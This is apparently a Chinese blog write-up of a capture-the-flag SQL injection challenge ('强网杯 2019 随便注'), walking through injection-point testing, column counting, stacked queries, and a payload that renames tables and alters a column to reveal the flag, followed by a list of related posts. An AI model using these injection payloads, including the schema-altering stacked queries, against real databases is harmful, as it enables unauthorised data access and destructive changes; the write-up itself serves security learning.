这是一个典型的sql注入题目

知识点:
1、注入点检测
2、万能匹配
3、暴力获得数据表和其属性
4、sql语句的掌握(order by; union select; rename table; alter table…等等)

1、进入网站

2、看到一个输入框一个提交框,尝试进行数据输入了解大致情况
经过尝试我们发现,只有输入1,2时有显示,输入0或者其他时没有显示
3、测试是否存在注入
and 1=1和and 1=2没有变化


在参数后面加单引号,发现错误,可以尝试进行注入

4、尝试0‘ or ‘1’='1;0" or “1”="1等,发现可行

5、尝试order by+数字,直至返回错误,获得表中的列树;#号用来注释掉后面的命令

1’ order by 2#
2’ order by 3#

发现3的时候报错,所以表中只有两列数据
6、联合查询,发现select等操作被过滤

1’ union select 1,2

7、获取表名,发现有两个表

0’; show tables;#


8、获取表中的列名,发现被查询的是words表,而flag在另一个表中,我们需要获取其中的饿内容

0'; show columns from words;#
0'; show columns from `1919810931114514`;#



9、更改表名列名(偷天换日)

因为查询是在words中查询id的,所以我们将表1919810931114514改名为words,将words改名为其余的名字。同时将flag属性改名为id属性,类型为varchar(100)

0';rename table `words` to words2;rename table `1919810931114514` to words;alter table words change flag id varchar(100);show tables;#

10、查看改之后的words表中的所有内容获得flag

1’ or ‘1’='1

【BUUCTF】[强网杯 2019]随便注 1相关推荐

  1. buuctf [强网杯 2019]随便注 1

    buuctf web [强网杯 2019]随便注 1 -刷题个人日记 小白一个,写给自己看. 打开后是这样. 从题目和内容来看就是一道sql注入题. 输入 1' or 1=1;# 这个#用来注释掉后面 ...

  2. BUUCTF [强网杯 2019]随便注

    题目 打开环境发现是经典的提交界面 老规则还是查询注入点,1 or 1 =1#,1' order by 1#都未出错,但是1' union select 1,2#是出现了错误,发现一些查询语句被过滤了 ...

  3. BMZCTF 强网杯 2019 随便注 原理+题解

    目录 知识点 堆叠注入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠注入 堆叠查询注入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开.而堆叠查询注入攻击就 ...

  4. BUUCTF Web [强网杯 2019]随便注

    「作者主页」:士别三日wyx   此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...

  5. 强网杯 2019]随便注 【SQL注入】四种解法

    题目简介 题目名称:[强网杯 2019]随便注 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL注入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = ...

  6. [强网杯 2019]随便注 —— 堆叠注入

                           [强网杯 2019]随便注 前言        个人观点,若有误请指教 解题思路及步骤 直接上'引号,结果直接报错了,证明存在sql注入漏洞. 判断当前表 ...

  7. [强网杯 2019]随便注 1

    题目[强网杯 2019]随便注 1 题目来源:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4% ...

  8. 【BUUCTF】强网杯 2019随便注1 write up

    输入万能密码1' or 1=1# ,判断存在sql注入, SQL注入的万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账号也可以登录后台. 万能密码原理: 万能密码能够绕过sql检测,在 ...

  9. (二)强网杯2019[随便注]

    堆叠注入学习(堆叠查询,Stacked Queries) 堆叠注入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠注入可以用于执行任何SQL语句. 堆叠注入原理 在 ...

最新文章

  1. 源码阅读:AFNetworking(八)——AFAutoPurgingImageCache
  2. Unity GUI(uGUI)使用心得与性能总结
  3. 嵌入式Web Service gSOAP的移植与应用(二)
  4. 最快60秒完成新冠病毒核酸对比 阿里云向社会免费开放基因计算服务
  5. Nginx反向代理的使用
  6. C++中string、char[]、char*之间的转换
  7. C# DataSet转ListDataTable
  8. Python getattr
  9. 一些mootools的资源
  10. Mysql之insert,update,delete
  11. python如何实现输出表格_python如何以表格形式打印输出
  12. 产品经理简历简历怎么写_完美的简历
  13. “APP故障门”频出,移动应用开发到底应该怎么做?
  14. php 判断某一天是周几,php如何判断一个日期是周几
  15. PDF打印内容缺失问题解决办法
  16. 京东登录注册页面的简单实现——(仿)
  17. 魔方cfop公式软件_【初级篇】(八)最简单的三阶魔方入门教程——顶棱还原...
  18. 上市公司“掘金”大数据 多领域大数据应用受热捧
  19. vue2打包兼容ie11白屏报错问题汇总
  20. 图形和函数图像的绘制

热门文章

  1. prometheus数据结构和压缩原理讲解
  2. 项目管理树状组织结构思维导图怎样绘制
  3. 【Clemetine】基于二项Logistic回归的电信客户流失预测
  4. sqlserver 2000安装图解教程
  5. 【 第八节 函数作用域】
  6. Python Pyside2 Pinger新手QQ音乐网易云酷狗爬虫下载
  7. 车流量检测实现:多目标追踪、卡尔曼滤波器、匈牙利算法、SORT/DeepSORT、yoloV3、虚拟线圈法、交并比IOU计算
  8. Struts1.x系列教程:用MyEclipse开发第一个Struts程序
  9. 2018年刑侦科推理试题php版,2018年刑侦科目推理试题完整版分享
  10. win10麦克风说话没声音_电脑录屏,真的没那么麻烦